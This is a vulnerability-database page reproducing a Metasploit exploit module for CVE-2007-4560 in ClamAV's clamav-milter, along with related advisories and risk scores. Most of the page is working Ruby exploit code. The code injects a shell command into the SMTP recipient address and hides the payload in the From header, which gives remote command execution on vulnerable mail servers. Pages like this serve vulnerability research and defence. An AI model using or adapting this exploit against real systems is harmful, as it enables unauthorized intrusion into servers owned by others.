Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit)

🗓️ 09 Oct 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 142 Views

ClamAV Milter Blackhole-Mode Remote Code Execution in Sendmai

Related
Code
ReporterTitlePublishedViews
Family
ALT Linux		Security fix for the ALT Linux 9 package clamav version 0.91.2-alt1
3 Sep 200700:00
altlinux
ALT Linux		Security fix for the ALT Linux 8 package clamav version 0.91.2-alt1
3 Sep 200700:00
altlinux
ALT Linux		Security fix for the ALT Linux 10 package clamav version 0.91.2-alt1
3 Sep 200700:00
altlinux
Tenable Nessus		ClamAV < 0.91.2 Multiple Remote DoS (deprecated)
22 Aug 200700:00
nessus
Tenable Nessus		ClamAV clamav-milter black-hole-mode Sendmail Recipient Field Arbitrary Command Execution
3 Jan 200800:00
nessus
Tenable Nessus		Debian DSA-1366-1 : clamav - several vulnerabilities
3 Sep 200700:00
nessus
Tenable Nessus		Fedora 7 : clamav-0.91.2-2.fc7 (2007-2050)
6 Nov 200700:00
nessus
Tenable Nessus		GLSA-200709-14 : ClamAV: Multiple vulnerabilities
24 Sep 200700:00
nessus
Tenable Nessus		Mac OS X Multiple Vulnerabilities (Security Update 2008-002)
19 Mar 200800:00
nessus
Tenable Nessus		Mandrake Linux Security Advisory : clamav (MDKSA-2007:172)
3 Sep 200700:00
nessus
Rows per page
##
# $Id: clamav_milter_blackhole.rb 10617 2010-10-09 06:55:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Smtp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ClamAV Milter Blackhole-Mode Remote Code Execution',
			'Description'    => %q{
					This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
				(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
				When implemented with black hole mode enabled, it is possible to execute
				commands remotely due to an insecure popen call.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10617 $',
			'References'     =>
				[
					[ 'CVE', '2007-4560' ],
					[ 'OSVDB', '36909' ],
					[ 'BID', '25439' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/4761' ],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					[ 'Automatic', { }],
				],
			'DisclosureDate' => 'Aug 24 2007',
			'DefaultTarget'  => 0))

			register_options(
			[
				OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),
			], self.class)
	end

	def exploit

		# ClamAV writes randomized msg.###### temporary files in a randomized
		# /tmp/clamav-#######################/ directory. This directory is
		# the clamav-milter process working directory.
		#
		# We *can* execute arbitrary code directly from 'sploit', however the
		# SMTP RFC rejects all payloads with the exception of generic CMD
		# payloads due to the IO redirects. I discovered that the 'From:'
		# header is written to this temporary file prior to the vulnerable
		# call, so we call the file itself and payload.encoded is executed.

		sploit = "sh msg*" # Execute the clamav-milter temporary file.

		# Create the malicious RCPT TO before connecting,
		# to make good use of the Msf::Exploit::Smtp support.

		oldaddr = datastore['MAILTO']
		newaddr = oldaddr.split('@')

		datastore['MAILTO'] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"

		connect_login

		sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header
		sock.put(".\r\n")

		# Clean up RCPT TO afterwards

		datastore['MAILTO'] = oldaddr

		handler
		disconnect
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Oct 2010 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 27.6
EPSS0.88269
clamavmilterremote code executionsendmailvulnerablecommand executionmetasploitexploitantivirussmtpremote accessinsecure popen
142